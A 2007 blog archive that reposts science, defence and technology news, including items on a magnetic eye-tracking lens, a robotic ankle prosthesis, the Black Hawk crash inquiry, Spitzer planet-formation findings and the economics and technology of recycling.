Tuesday, July 31, 2007

DefenceTECH:Spotting the Magnetic Eye & Attack of the Battery Man!


For full rage of Security and defence and to develop the technology in the defense sector their are many innitiatives which can reach the pick...



Spotting the Magnetic Eye



Tracking eye movements can let a computer know when someone is paying attention and identify exactly what they are interested in, but it's also a tricky business. Most systems work by using a camera and image recognition software to identify a person's pupils and work out the direction of their gaze.



In real-life situations, however, tracking systems can be easily confused by rapid head movement or spectacles.



Now, the Office of Naval Research is looking for better ways of tracking eyes in the hope of developing military applications, such as tracking a fighter pilot's gaze.



So it has a funded James DiCarlo, a neuroscientist at the Massachusetts Institute of Technology in Cambridge, US, to develop a magnetic contact lens.



A soldier would wear the lenses and a magnetic sensor attached to the side of his or her head. The sensor picks up any changes in the local magnetic field and works out how the wearer's eyes are moving.



The system should work regardless of head orientation and movement, lighting condition,s or "face furniture" such as goggles or glasses. The team says the magnetic lenses could also let disabled people control equipment such as wheelchairs.



Attack of the Battery Man
Just thought I'd forward a new Pentagon announcement intended to prompt a competitive solution to the problem of lightweight power generation for the increasing number of electronic devices carried by grunts and Joes in combat...



The Director, Defense Research and Engineering, John Young today announced a public prize competition to develop a wearable electric power system for war fighters. The competition will take place in the fall of 2008 and the prizes are $1 million for first place, $500,000 for second place and $250,000 for third place.



The essential electronic equipment that dismounted warfighters carries today - radios, night vision devices, global positioning system - runs on batteries. This competition will gather and test the good ideas for reducing the weight of the batteries that service members carry. The prize objective is a wearable, prototype system that can power a standard warfighter's equipment for 96 hours but weighs less than half that of the current batteries carried. All components, including the power generator, electrical storage, control electronics, connectors and fuel must weigh four kilograms or less, including any attachments.



Prizes will be awarded to the top three teams in a final competitive demonstration planned for the fall of 2008. At this "wear-off," individuals or teams will demonstrate their prototype systems under realistic conditions. The top three competitors that demonstrate a complete, wearable system that produces 20 watts average power for 96 hours but weighs less than 4 kilograms (~8.8 lbs) will win the prizes.



A public information forum will be held in September in the Washington, D.C., area to brief potential competitors on the technical details, the competition rules, and qualification requirements. Competitors must register to participate in the prize program by Nov. 30, 2007. The competition is open for international participation; however the individual or team leader must provide proof of U.S. citizenship. Details on the forum, as well as contest registration and rules are posted on the Defense Research and Engineering Prize Web site.






Technorati : , , , , , , , , ,

Wednesday, July 25, 2007

Bye-bye Google welcome Microsoft -Digg


Kevin Rose at Digg is saying the popular user-driven news site has just signed a three-year exclusive ad deal with Microsoft. Bye-bye Google. Don't think it will hurt Google's bottom line much, and Mike Arrington at TechCrunch thinks it's another money-losing deal for the software giant, which also did a similar deal with Facebook. But neither is this a ringing endorsement of Google from one of the stars of Web 2.0, with 17 million unique monthly users. "No dancing monkey ads, and the design will remain uncluttered," Rose vows, no doubt anticipating the usual Microsoft-bashing in Digg comments on the post.



Although John Battelle's Federated Media is still involved and apparently will work with Microsoft on Digg sponsorships, some folks are wondering if Federated's role is rather less than it was intended to be. Will update as I hear more.



For now, though, "it's a real coup for Microsoft," Internet marketing consultant Andy Beal told my colleague Tom Giles. "It's a good way to put their product in front of a high-tech savvy audience." On the other hand, it remains to be seen how lucrative an ad magnet Digg will be. Ashkan Karbasfrooshan at watchmojo.com thinks not so much.



As for the odd man out, Yahoo!, Beal says it's in a tough position: "They want to get the partnerships away from Google, but can't afford to cut deals. They need the revenue coming in. With investors watching closely, I don't think Yahoo can afford to be ultra-aggressive."



Clearly, the battle for the ad business of the new crop of Web companies is intensifying. In particular, it will be interesting to see how Google and Microsoft will spend their seemingly boundless budgets--and if and when we'll see one of them blink. Not for a good long while, I think.





Technorati :

Robotic ankle research gets off on the right foot


An Army veteran who lost part of his leg in Iraq walked with more spring in his step Monday as he unveiled the world's first robotic ankle -- an important advance for lower-limb amputees that was developed by a team at MIT.



Garth Stewart, 24, who lost his left leg below the knee in an explosion in Iraq, demonstrated the new powered ankle-foot prosthesis during a ceremony at the Providence, R.I., Veterans Affairs Medical Center. Stewart walked in the device, which, unlike any other, propels users forward using tendon-like springs and an electric motor. The prototype device reduces fatigue, improves balance and provides amputees with a more fluid gait. It could become commercially available as early as the summer of 2008.



MIT Media Lab Professor Hugh Herr and his team of researchers developed the ankle-foot. Herr, NEC Career Development Professor and head of the biomechatronics research group at the Media Lab, is a VA research investigator. He is also a double amputee who tested his invention: "This design releases three times the power of a conventional prosthesis to propel you forward and, for the first time, provides amputees with a truly humanlike gait," Herr said.



"It's wild," he said, "like you're on one of those moving walkways in the airport."



Because conventional prostheses only provide a passive spring response during walking, they force the amputee to have an unnatural gait and typically to expend some 30 percent more energy on walking than a non-amputee. The new ankle is light, flexible, and -- most importantly -- generates energy for walking beyond that which can be released from a spring alone.



This is accomplished through a device equipped with multiple springs and a small battery-powered motor. The energy produced from the forward motion of the person wearing the prosthesis is stored in the power-assisted spring, and then released as the foot pushes off. Additional mechanical energy is also added to help momentum.



Herr created the device through the Center for Restorative and Regenerative Medicine (CRRM), a collaborative research initiative that includes the Providence VA Medical Center, Brown University and MIT. The center's mission is to improve the lives of individuals with limb trauma through tissue restoration, advanced rehabilitation and new prosthetics that give amputees - particularly war veterans - better mobility and control of their limbs and reduce the discomfort and infections common with current prostheses.



To achieve this goal, the center funds a team of researchers with expertise in tissue engineering, orthopedics, neurotechnology, prosthetic design and rehabilitation. The aim is to bring these complementary techniques together to create "biohybrid" limbs composed of biological and man-made materials - a melding of man and machine.



To meet this goal, the VA has provided an additional $6.9 million to construct a state-of-the-art rehabilitation research building that will house the center on the campus of the Providence VA Medical Center. Construction begins this fall.



"A major goal of the center is to develop artificial limbs that perform like biological ones," said Professor Roy Aaron, M.D., of Brown University, director of the CRRM. "Hugh Herr and his team have met that goal - and done so successfully. This device is a major step forward for Garth Stewart and other amputees."



Joel Kupersmith, M.D., chief research and development officer for VA, said a top priority for the department is providing state-of-the-art prosthetic care for veterans - especially those returning from Iraq and Afghanistan. VA research, he said, is integral to this effort.



"The robotic ankle is a sterling example of how our leading-edge research improves veterans' lives," Kupersmith said. "Up to now, prosthetic devices have not been able to duplicate the complex functions of our feet and ankles as we walk and run. The ingenious computerized design of this new prosthesis changes all of this, as it constantly 'thinks' and responds, allowing the person to walk or run in a more natural and comfortable way."



Michael E. Selzer, M.D., director of Rehabilitation Research and Development for VA, agreed: "Hugh Herr and his Media Lab group are well-known for their scientific ingenuity and creativity on behalf of amputees. This new technology represents rehabilitation research at its finest, and is yet another milestone in VA's long history of outstanding achievements in this area."

adding time to the school day in order to focus on reading and math


Almost half the nation’s school districts have significantly decreased the daily class time spent on subjects like science, art and history as a result of the federal No Child Left Behind law’s focus on annual tests in reading and math, according to a new report released yesterday.
The report, by the Center on Education Policy, a Washington group that studies the law’s implementation in school districts nationwide, said that about 44 percent of districts have cut time from one or more subjects or activities in elementary schools to extend time for longer daily math and reading lessons. Among the subjects or activities getting less attention since the law took effect in 2002 are science, social studies, art and music, gym, lunch and recess, the report said.
The report, based on a survey of nearly 350 of the nation’s 15,000 districts, said 62 percent of school districts had increased daily class time in reading and math since the law took effect.
Within a year of the law’s implementation, teachers and their associations were reporting that schools and districts were suggesting or requiring that they spend more time on reading and math to improve test scores, and that they cut back time spent on other disciplines.
The narrowing of the nation’s elementary school curriculum has been significant, according to the report, but may not be affecting as many schools as previously thought.
A report that the center issued in March 2006, based on a similar survey, gave one of the first measures of the extent of the narrowing trend. It said 71 percent of districts had reduced elementary school instruction in at least one other subject to make more time for reading and mathematics. That finding attracted considerable attention, with many groups opposed to the law decrying the trend.
The law’s backers, including Secretary of Education Margaret Spellings, argued that the intensification of English and math instruction made good sense on its own because, they said, students who could not read or calculate with fluency would flounder in other subjects, too.
The center’s new report raises the question of how to explain the considerable discrepancy between last year’s finding, that 71 percent of districts had reduced instructional time in subjects other than math and reading, and this year’s, which gives the number as 44 percent.
Jack Jennings, the center’s president, said in an interview that the discrepancy was a result of a change in the wording of the questionnaire. Last year’s survey asked districts to say whether they had reduced instructional time in subjects other than reading and math “to a great extent,” “somewhat,” “minimally” or “not at all.” Districts that reported even minimally reduced instructional time on other subjects were included in the 71 percent, along with districts that carried out more substantial changes, Mr. Jennings said.
This year, the center listed English/language arts and math as well as social studies, art and music, science and other subjects on the survey, and asked districts whether class time in each had increased, stayed the same or decreased since the law’s enactment. In a second column, the survey asked districts to indicate the number of minutes by which instructional time had increased or decreased.
Districts that made only small reductions this year, 10 minutes a day or less, in the time devoted to courses other than reading or math, may have chosen to report that instructional time had remained the same, Mr. Jennings said. On last year’s survey, the same districts may instead have acknowledged reducing the time, while characterizing the reduction as minimal, he said.
According to the new survey, the average change in instructional time in elementary schools since the law’s enactment has been 140 additional minutes per week for reading, 87 additional minutes per week for math, 76 fewer minutes per week for social studies, 75 fewer minutes for science, 57 fewer minutes for art and 40 fewer minutes for gym.
In a statement, Secretary Spellings said the report’s scope was “too limited to draw broad conclusions.”
“In fact,” she said, “there is much evidence that shows schools are adding time to the school day in order to focus on reading and math, not cutting time from other subjects.”

Tuesday, July 24, 2007

Experts have recreated the final, fateful moments leading up to last year's Black Hawk helicopter crash off Fiji.



Defence department experts have recreated the final, fateful moments leading up to last year's Black Hawk helicopter crash off Fiji.
It emerged at the Sydney military board of inquiry into the crash that given the conditions of the helicopter's approach to land on HMAS Kanimbla, there was insufficient power to slow its descent and lessen its impact with the warship.
Through a combination of 3D computer modelling, helicopter simulator trials and the analysis of the Black Hawk's flight data recorder (FDR), experts also were able to rule out engine failure as a cause of the crash.
The expert witnesses from the Defence Science and Technology Organisation (DSTO) gave evidence as part of the inquiry into how the helicopter failed to negotiate a landing on the deck of the Kanimbla and plunged into the sea last November.
The pilot, Captain Mark Bingley, and SAS Trooper Joshua Porter were killed when the aircraft crashed during practice for evacuations from coup-stricken Fiji.
Helicopter simulation expert Sylvain Manso talked the board through footage of two of the army's top pilots undertaking simulator runs recreating the ill-fated manoeuvre attempted by Capt Bingley.
Those that most closely followed Capt Bingley's route found it had resulted in "unrecoverable descent rate", Mr Manso told the board.
"There was insufficient available power to recover from the flight conditions from the defined ingress," Mr Manso said.
Video footage from a security camera aboard the Kanimbla allowed experts in photogrammetry, which is the science of measuring object position using images, to plot much of the Black Hawk's approach.
Another DSTO expert, Thuan Truong, brought to life an analysis of data from the FDR, retrieved from the helicopter wreckage.
Through a series of graphs depicting flight data recorded as frequently as eight times per second, Mr Truong was able to show how Capt Bingley desperately pulled hard on the control stick in a bid to raise the nose in the last two seconds before the crash.
The graphs also revealed how Capt Bingley frantically pumped the helicopter's right pedal as he tried to correct its course.
The FDR data also gave further weight to the role of "rotor droop", where the main rotor loses power, in causing the crash.
Although no data was recorded for the main rotor, Mr Truong said data showing how power to the tail rotor plummeted to 75 per cent could be applied with reasonable accuracy to the main rotor.
"There was a tremendous reduction of aircraft lift, at 75 per cent rpm (rotor speed) the aircraft lift is approximately half its weight," Mr Truong said.
Helicopter structure engineer Dominigo Lombardo said he had inspected the salvaged wreckage of the Black Hawk and found no evidence of engine failure.
"There was nothing that stood out as being unusual," he said.
The evidence from the FDR and simulator runs also ruled out engine failure.
The inquiry continues on Tuesday.

Spitzer Finds Evidence for Planets with Four Parents.Planets with Four Parents? Spitzer Shows it's Possible,


Image credit: NASA/JPL-Caltech/UCLA

How many stars does it take to "raise" a planet? In our own solar system, it took only one -- our sun. However, new research from NASA's Spitzer Space Telescope shows that planets might be forming in systems with as many as four stars. This artist's concept illustrates one such quadruple-star system, called HD 98800. The system is still relatively young, at 10 million years old. One of its two pairs of stars is known to be circled by a dusty disk, which contains materials that are thought to clump together to form planets.


When Spitzer set its infrared gaze on the disk, it detected gaps. How did the gaps get there? One possible answer is that planets are growing in size and carving out lanes in the dust. Spitzer found two gaps in the disk. The inner gap is about as far away from its central stars as Mars and the asteroid belt are from our sun.

The outer gap is about as far away from its central stars as Jupiter is from the sun. HD 98800 is located 150 light-years away in the constellation TW Hydrae.


Before Spitzer set its gaze on HD 98800, astronomers had a rough idea of the system's structure from observations with ground-based telescopes. They knew the system contains four stars, and that the stars are paired off into doublets, or binaries. The stars in the binary pairs orbit around each other, and the two pairs also circle each other like choreographed ballerinas. One of the stellar pairs, called HD 98800B, has a disk of dust around it, while the other pair has none.


Although the four stars are gravitationally bound, the distance separating the two binary pairs is about 50 astronomical units (AU) -- slightly more than the average distance between our sun and Pluto. Until now, technological limitations have hindered astronomers' efforts to look at the dusty disk around HD 98800B more closely.


With Spitzer, scientists finally have a detailed view. Using the telescope's infrared spectrometer, Furlan's team sensed the presence of two belts in the disk made of large dust grains. One belt sits at approximately 5.9 AU away from the central binary, HD 98800B, or about the distance from the sun to Jupiter. This belt is likely made up of asteroids or comets. The other belt sits at 1.5 to 2 AU, comparable to the area where Mars and the asteroid belt sit, and probably consists of fine grains.


"Typically, when astronomers see gaps like this in a debris disk, they suspect that a planet has cleared the path. However, given the presence of the diskless pair of stars sitting 50 AU away, the inward-migrating dust particles are likely subject to complex, time-varying forces, so at this point the existence of a planet is just speculation," said Furlan.


Astronomers believe that planets form like snowballs over millions of years, as small dust grains clump together to form larger bodies. Some of these cosmic rocks then smash together to form rocky planets, like Earth, or the cores of gas-giant planets like Jupiter. Large rocks that don't form planets often become asteroids and comets. As these rocky structures violently collide, bits of dust are released into space. Scientists can see these dust grains with Spitzer's supersensitive infrared eyes.


According to Furlan, the dust generated from the collision of rocky objects in the outer belt should eventually migrate toward the inner disk. However, in the case of HD 98800B, the dust particles do not evenly fill out the inner disk as expected, due to either planets or the diskless binary pair sitting 50 AU away and gravitationally influencing the movement of dust particles.


"Since many young stars form in multiple systems, we have to realize that the evolution of disks around them and the possible formation of planetary systems can be way more complicated and perturbed than in a simple case like our solar system," Furlan added



More Negativity Found in Space




Two teams of astronomers have identified the signal of a new negatively charged molecule, or anion, in space — only the third found in the cosmos. About 130 neutral and 12 positively charged molecules have been detected in space.
Along with its two siblings, the newfound anion, called octatetraynyl, could be among the building blocks of the organic molecules that make up living things. Even more interestingly, the two teams found the anion in entirely different cosmic locales.
Octatetraynyl is an odd little string of eight carbon atoms and a single hydrogen atom, written as C8H-. Its negative charge comes from the molecule having one electron more than is needed to balance the positive protons in all the atoms' nuclei.




It's not the sort of molecule that would last long on Earth, where there are all sorts of reactive molecules ready to make it neutral.
"Some of the things we're detecting in space you'd never find on Earth," said Anthony Remijan of the National Radio Astronomy Observatory (NRAO).
That's what makes them hard to find in space, he explained: Not having them here, we are hard put to know what they will look like. That has made the hunt a long and multi-disciplinary process.
The search began in the 1990s, when radio astronomers surveying the sky noticed some unusual lines showing up in spectrums of radio signal, Remijan explained.
Such lines are usually the calling cards of specific compounds, which absorb or emit very narrow radio bands. But in this case, no one knew of any compounds that produced such lines.
Other researchers, including Eric Herbst of Ohio State University, had already done some calculations and made models about what sorts of compounds might produce certain radio lines. But it took actual laboratory tests on manmade versions of the molecules to verify what kind of radio lines anions would make.
For octatetraynyl, that lab work was completed only last year.




Finally, radio astronomers went looking specifically for octatetraynyl's laboratory-tested lines. A Harvard team looked at a cold, dark gas cloud and a team from NRAO looked in the tenuous outer envelope of a dying star.
Both teams used the National Science Foundation's giant Green Bank Telescope (GBT) in West Virginia, which sees the universe in radio waves. Both found octatetraynyl.
"It's not so different physically," said Herbst of the two space environments. They have similar temperatures and densities, he said, though the way the anion was created could be different.




Which raises a big question: How do the molecules get their extra electron?
"One mechanism is a two-body process," said Herbst. In other words, a free-flying electron simply slams into a molecule and sticks.
As for whether more anions will be discovered in space, "There are many other candidates," Herbst told Discovery News. "But they have to be measured in the laboratory first." Then radio astronomers will know what to look for.




Construction has been completed on the world's largest fully steerable radio telescope at the National Radio Astronomy Observatory's site in Green Bank, Pocahontas County, West Virginia (79° 50' 23.40" W, 38° 25' 59.23" N : NAD83).
The GBT is described as a 100-meter telescope, but the actual dimensions of the surface are 100 by 110 meters. The overall structure of the GBT is a wheel-and-track design that allows the telescope to view the entire sky above 5 degrees elevation. The track, 64 m (210 ft) in diameter, is level to within a few thousandths of an inch in order to provide precise pointing of the structure while bearing 7300 metric tons (16,000,000 pounds) of moving weight.
The GBT is of an unusual design. Unlike conventional telescopes, which have a series of supports in the middle of the surface, the GBT's aperture is unblocked so that incoming radiation meets the surface directly. This increases the useful area of the telescope and eliminates reflection and diffraction that ordinarily complicate a telescope's pattern of response. To accommodate this, an off-axis feed arm cradles the dish, projecting upward at one edge, and the telescope surface is asymmetrical. It is actually a 100-by-110 meter section of a conventional, rotationally symmetric 208-meter figure, beginning four meters outward from the vertex of the hypothetical parent structure.
The GBT's lack of circular symmetry greatly increases the complexity of its design and construction. The GBT is also unusual in that the 2,004 panels that make up its surface are mounted at their corners on actuators, little motor-driven pistons, which make it easier to adjust the surface shape. Such adjustment is crucial to the high-frequency performance of the GBT in which an accurate surface figure must be maintained.
The GBT is equipped with a novel laser-ranging system. Beams of light are reflected within the structure and between the telescope and a series of ground stations surrounding the telescope in a broad ring. Monitoring of these beams show the deformation of the figure under such stresses as gravity, wind and temperature differences, and allow the telescope's motors, subreflector and surface panel actuators to compensate for any ill effects.

Monday, July 23, 2007

As the importance of recycling becomes more apparent, questions about it linger. Is it worth the effort? How does it work? Is recycling waste just goi


IT IS an awful lot of rubbish. Since 1960 the amount of municipal waste being collected in America has nearly tripled, reaching 245m tonnes in 2005. According to European Union statistics, the amount of municipal waste produced in western Europe increased by 23% between 1995 and 2003, to reach 577kg per person. (So much for the plan to reduce waste per person to 300kg by 2000.) As the volume of waste has increased, so have recycling efforts. In 1980 America recycled only 9.6% of its municipal rubbish; today the rate stands at 32%. A similar trend can be seen in Europe, where some countries, such as Austria and the Netherlands, now recycle 60% or more of their municipal waste. Britain's recycling rate, at 27%, is low, but it is improving fast, having nearly doubled in the past three years.
Even so, when a city introduces a kerbside recycling programme, the sight of all those recycling lorries trundling around can raise doubts about whether the collection and transportation of waste materials requires more energy than it saves. “We are constantly being asked: Is recycling worth doing on environmental grounds?” says Julian Parfitt, principal analyst at Waste & Resources Action Programme (WRAP), a non-profit British company that encourages recycling and develops markets for recycled materials.
Studies that look at the entire life cycle of a particular material can shed light on this question in a particular case, but WRAP decided to take a broader look. It asked the Technical University of Denmark and the Danish Topic Centre on Waste to conduct a review of 55 life-cycle analyses, all of which were selected because of their rigorous methodology. The researchers then looked at more than 200 scenarios, comparing the impact of recycling with that of burying or burning particular types of waste material. They found that in 83% of all scenarios that included recycling, it was indeed better for the environment.
Based on this study, WRAP calculated that Britain's recycling efforts reduce its carbon-dioxide emissions by 10m-15m tonnes per year. That is equivalent to a 10% reduction in Britain's annual carbon-dioxide emissions from transport, or roughly equivalent to taking 3.5m cars off the roads. Similarly, America's Environmental Protection Agency estimates that recycling reduced the country's carbon emissions by 49m tonnes in 2005.
Recycling has many other benefits, too. It conserves natural resources. It also reduces the amount of waste that is buried or burnt, hardly ideal ways to get rid of the stuff. (Landfills take up valuable space and emit methane, a potent greenhouse gas; and although incinerators are not as polluting as they once were, they still produce noxious emissions, so people dislike having them around.) But perhaps the most valuable benefit of recycling is the saving in energy and the reduction in greenhouse gases and pollution that result when scrap materials are substituted for virgin feedstock. “If you can use recycled materials, you don't have to mine ores, cut trees and drill for oil as much,” says Jeffrey Morris of Sound Resource Management, a consulting firm based in Olympia, Washington.
Extracting metals from ore, in particular, is extremely energy-intensive. Recycling aluminium, for example, can reduce energy consumption by as much as 95%. Savings for other materials are lower but still substantial: about 70% for plastics, 60% for steel, 40% for paper and 30% for glass. Recycling also reduces emissions of pollutants that can cause smog, acid rain and the contamination of waterways.
A brief history of recyclingThe virtue of recycling has been appreciated for centuries. For thousands of years metal items have been recycled by melting and reforming them into new weapons or tools. It is said that the broken pieces of the Colossus of Rhodes, a statue deemed one of the seven wonders of the ancient world, were recycled for scrap. During the industrial revolution, recyclers began to form businesses and later trade associations, dealing in the collection, trade and processing of metals and paper. America's Institute of Scrap Recycling Industries (ISRI), a trade association with more than 1,400 member companies, traces its roots back to one such organisation founded in 1913. In the 1930s many people survived the Great Depression by peddling scraps of metal, rags and other items. In those days reuse and recycling were often economic necessities. Recycling also played an important role during the second world war, when scrap metal was turned into weapons.
As industrial societies began to produce ever-growing quantities of garbage, recycling took on a new meaning. Rather than recycling materials for purely economic reasons, communities began to think about how to reduce the waste flow to landfills and incinerators. Around 1970 the environmental movement sparked the creation of America's first kerbside collection schemes, though it was another 20 years before such programmes really took off.
In 1991 Germany made history when it passed an ordinance shifting responsibility for the entire life cycle of packaging to producers. In response, the industry created Duales System Deutschland (DSD), a company that organises a separate waste-management system that exists alongside public rubbish-collection. By charging a licensing fee for its “green dot” trademark, DSD pays for the collection, sorting and recycling of packaging materials. Although the system turned out to be expensive, it has been highly influential. Many European countries later adopted their own recycling initiatives incorporating some degree of producer responsibility.
In 1987 a rubbish-laden barge cruised up and down America's East Coast looking for a place to unload, sparking a public discussion about waste management and serving as a catalyst for the country's growing recycling movement. By the early 1990s so many American cities had established recycling programmes that the resulting glut of materials caused the market price for kerbside recyclables to fall from around $50 per ton to about $30, says Dr Morris, who has been tracking prices for recyclables in the Pacific Northwest since the mid-1980s. As with all commodities, costs for recyclables fluctuate. But the average price for kerbside materials has since slowly increased to about $90 per ton.
Even so, most kerbside recycling programmes are not financially self-sustaining. The cost of collecting, transporting and sorting materials generally exceeds the revenues generated by selling the recyclables, and is also greater than the disposal costs. Exceptions do exist, says Dr Morris, largely near ports in dense urban areas that charge high fees for landfill disposal and enjoy good market conditions for the sale of recyclables.
Sorting things outOriginally kerbside programmes asked people to put paper, glass and cans into separate bins. But now the trend is toward co-mingled or “single stream” collection. About 700 of America's 10,000 kerbside programmes now use this approach, says Kate Krebs, executive director of America's National Recycling Coalition. But the switch can make people suspicious: if there is no longer any need to separate different materials, people may conclude that the waste is simply being buried or burned. In fact, the switch towards single-stream collection is being driven by new technologies that can identify and sort the various materials with little or no human intervention. Single-stream collection makes it more convenient for householders to recycle, and means that more materials are diverted from the waste stream.
San Francisco, which changed from multi to single-stream collection a few years ago, now boasts a recycling rate of 69%—one of the highest in America. With the exception of garden and food waste, all the city's kerbside recyclables are sorted in a 200,000-square-foot facility that combines machines with the manpower of 155 employees. The $38m plant, next to the San Francisco Bay, opened in 2003. Operated by Norcal Waste Systems, it processes an average of 750 tons of paper, plastic, glass and metals a day.
The process begins when a truck arrives and dumps its load of recyclables at one end of the building. The materials are then piled on to large conveyer belts that transport them to a manual sorting station. There, workers sift through everything, taking out plastic bags, large pieces of cardboard and other items that could damage or obstruct the sorting machines. Plastic bags are especially troublesome as they tend to get caught in the spinning-disk screens that send weightier materials, such as bottles and cans, down in one direction and the paper up in another.
Corrugated cardboard is separated from mixed paper, both of which are then baled and sold. Plastic bottles and cartons are plucked out by hand. The most common types, PET (type 1) and HDPE (type 2), are collected separately; the rest go into a mixed-plastics bin.
Next, a magnet pulls out any ferrous metals, typically tin-plated or steel cans, while the non-ferrous metals, mostly aluminium cans, are ejected by eddy current. Eddy-current separators, in use since the early 1990s, consist of a rapidly revolving magnetic rotor inside a long, cylindrical drum that rotates at a slower speed. As the aluminium cans are carried over this drum by a conveyer belt, the magnetic field from the rotor induces circulating electric currents, called eddy currents, within them. This creates a secondary magnetic field around the cans that is repelled by the magnetic field of the rotor, literally ejecting the aluminium cans from the other waste materials.
Finally, the glass is separated by hand into clear, brown, amber and green glass. For each load, the entire sorting process from start to finish takes about an hour, says Bob Besso, Norcal's recycling-programme manager for San Francisco.
Although all recycling facilities still employ people, investment is increasing in optical sorting technologies that can separate different types of paper and plastic. Development of the first near-infra-red-based waste-sorting systems began in the early 1990s. At the time Elopak, a Norwegian producer of drink cartons made of plastic-laminated cardboard, worried that it would have to pay a considerable fee to meet its producer responsibilities in Germany and other European countries. To reduce the overall life-cycle costs associated with its products, Elopak set out to find a way to automate the sorting of its cartons. The company teamed up with SINTEF, a Norwegian research centre, and in 1996 sold its first unit in Germany. The technology was later spun off into a company now called TiTech.
TiTech's systems—more than 1,000 of which are now installed worldwide—rely on spectroscopy to identify different materials. Paper and plastic items are spread out on a conveyor belt in a single layer. When illuminated by a halogen lamp, each type of material reflects a unique combination of wavelengths in the infra-red spectrum that can be identified, much like a fingerprint. By analysing data from a sensor that detects light in both the visible and the near-infra-red spectrum, a computer is able to determine the colour, type, shape and position of each item. Air jets are then activated to push particular items from one conveyor belt to another, or into a bin. Numerous types of paper, plastic or combinations thereof can thus be sorted with up to 98% accuracy.
For many materials the process of turning them back into useful raw materials is straightforward: metals are shredded into pieces, paper is reduced to pulp and glass is crushed into cullet. Metals and glass can be remelted almost indefinitely without any loss in quality, while paper can be recycled up to six times. (As it goes through the process, its fibres get shorter and the quality deteriorates.)
Plastics, which are made from fossil fuels, are somewhat different. Although they have many useful properties—they are flexible, lightweight and can be shaped into any form—there are many different types, most of which need to be processed separately. In 2005 less than 6% of the plastic from America's municipal waste stream was recovered. And of that small fraction, the only two types recycled in significant quantities were PET and HDPE. For PET, food-grade bottle-to-bottle recycling exists. But plastic is often “down-cycled” into other products such as plastic lumber (used in place of wood), drain pipes and carpet fibres, which tend to end up in landfills or incinerators at the end of their useful lives.
Even so, plastics are being used more and more, not just for packaging, but also in consumer goods such as cars, televisions and personal computers. Because such products are made of a variety of materials and can contain multiple types of plastic, metals (some of them toxic), and glass, they are especially difficult and expensive to dismantle and recycle.
Europe and Japan have initiated “take back” laws that require electronics manufacturers to recycle their products. But in America only a handful of states have passed such legislation. That has caused problems for companies that specialise in recycling plastics from complex waste streams and depend on take-back laws for getting the necessary feedstock. Michael Biddle, the boss of MBA Polymers, says the lack of such laws is one of the reasons why his company operates only a pilot plant in America and has its main facilities in China and Austria.
Much recyclable material can be processed locally, but ever more is being shipped to developing nations, especially China. The country has a large appetite for raw materials and that includes scrap metals, waste paper and plastics, all of which can be cheaper than virgin materials. In most cases, these waste materials are recycled into consumer goods or packaging and returned to Europe and America via container ships. With its hunger for resources and the availability of cheap labour, China has become the largest importer of recyclable materials in the world.
The China questionBut the practice of shipping recyclables to China is controversial. Especially in Britain, politicians have voiced the concern that some of those exports may end up in landfills. Many experts disagree. According to Pieter van Beukering, an economist who has studied the trade of waste paper to India and waste plastics to China: “as soon as somebody is paying for the material, you bet it will be recycled.”
In fact, Dr van Beukering argues that by importing waste materials, recycling firms in developing countries are able to build larger factories and achieve economies of scale, recycling materials more efficiently and at lower environmental cost. He has witnessed as much in India, he says, where dozens of inefficient, polluting paper mills near Mumbai were transformed into a smaller number of far more productive and environmentally friendly factories within a few years.
Still, compared with Western countries, factories in developing nations may be less tightly regulated, and the recycling industry is no exception. China especially has been plagued by countless illegal-waste imports, many of which are processed by poor migrants in China's coastal regions. They dismantle and recycle anything from plastic to electronic waste without any protection for themselves or the environment.
The Chinese government has banned such practices, but migrant workers have spawned a mobile cottage industry that is difficult to wipe out, says Aya Yoshida, a researcher at Japan's National Institute for Environmental Studies who has studied Chinese waste imports and recycling practices. Because this type of industry operates largely under the radar, it is difficult to assess its overall impact. But it is clear that processing plastic and electronic waste in a crude manner releases toxic chemicals, harming people and the environment—the opposite of what recycling is supposed to achieve.
Under pressure from environmental groups, such as the Silicon Valley Toxics Coalition, some computer-makers have established rules to ensure that their products are recycled in a responsible way. Hewlett-Packard has been a leader in this and even operates its own recycling factories in California and Tennessee. Dell, which was once criticised for using prison labour to recycle its machines, now takes back its old computers for no charge. And last month Steve Jobs detailed Apple's plans to eliminate the use of toxic substances in its products.
Far less controversial is the recycling of glass—except, that is, in places where there is no market for it. Britain, for example, is struggling with a mountain of green glass. It is the largest importer of wine in the world, bringing in more than 1 billion litres every year, much of it in green glass bottles. But with only a tiny wine industry of its own, there is little demand for the resulting glass. Instead what is needed is clear glass, which is turned into bottles for spirits, and often exported to other countries. As a result, says Andy Dawe, WRAP's glass-technology manager, Britain is in the “peculiar situation” of having more green glass than it has production capacity for.
Britain's bottle-makers already use as much recycled green glass as they can in their furnaces to produce new bottles. So some of the surplus glass is down-cycled into construction aggregates or sand for filtration systems. But WRAP's own analysis reveals that the energy savings for both appear to be “marginal or even disadvantageous”. Working with industry, WRAP has started a new programme called GlassRite Wine, in an effort to right the imbalance. Instead of being bottled at source, some wine is now imported in 24,000-litre containers and then bottled in Britain. This may dismay some wine connoisseurs, but it solves two problems, says Mr Dawe: it reduces the amount of green glass that is imported and puts what is imported to good use. It can also cut shipping costs by up to 40%.
The future of recyclingThis is an unusual case, however. More generally, one of the biggest barriers to more efficient recycling is that most products were not designed with recycling in mind. Remedying this problem may require a complete rethinking of industrial processes, says William McDonough, an architect and the co-author of a book published in 2002 called “Cradle to Cradle: Remaking the Way We Make Things”. Along with Michael Braungart, his fellow author and a chemist, he lays out a vision for establishing “closed-loop” cycles where there is no waste. Recycling should be taken into account at the design stage, they argue, and all materials should either be able to return to the soil safely or be recycled indefinitely. This may sound like wishful thinking, but Mr McDonough has a good pedigree. Over the years he has worked with companies including Ford and Google.
An outgrowth of “Cradle to Cradle” is the Sustainable Packaging Coalition, a non-profit working group that has developed guidelines that look beyond the traditional benchmarks of packaging design to emphasise the use of renewable, recycled and non-toxic source materials, among other things. Founded in 2003 with just nine members, the group now boasts nearly 100 members, including Target, Starbucks and Estée Lauder, some of which have already begun to change the design of their packaging.
Sustainable packaging not only benefits the environment but can also cut costs. Last year Wal-Mart, the world's biggest retailer, announced that it wanted to reduce the amount of packaging it uses by 5% by 2013, which could save the company as much as $3.4 billion and reduce carbon-dioxide emissions by 667,000 tonnes. As well as trying to reduce the amount of packaging, Wal-Mart also wants to recycle more of it. Two years ago the company began to use an unusual process, called the “sandwich bale”, to collect waste material at its stores and distribution centres for recycling. It involves putting a layer of cardboard at the bottom of a rubbish compactor before filling it with waste material, and then putting another layer of cardboard on top. The compactor then produces a “sandwich” which is easier to handle and transport, says Jeff Ashby of Rocky Mountain Recycling, who invented the process for Wal-Mart. As well as avoiding disposal costs for materials it previously sent to landfill, the company now makes money by selling waste at market prices.
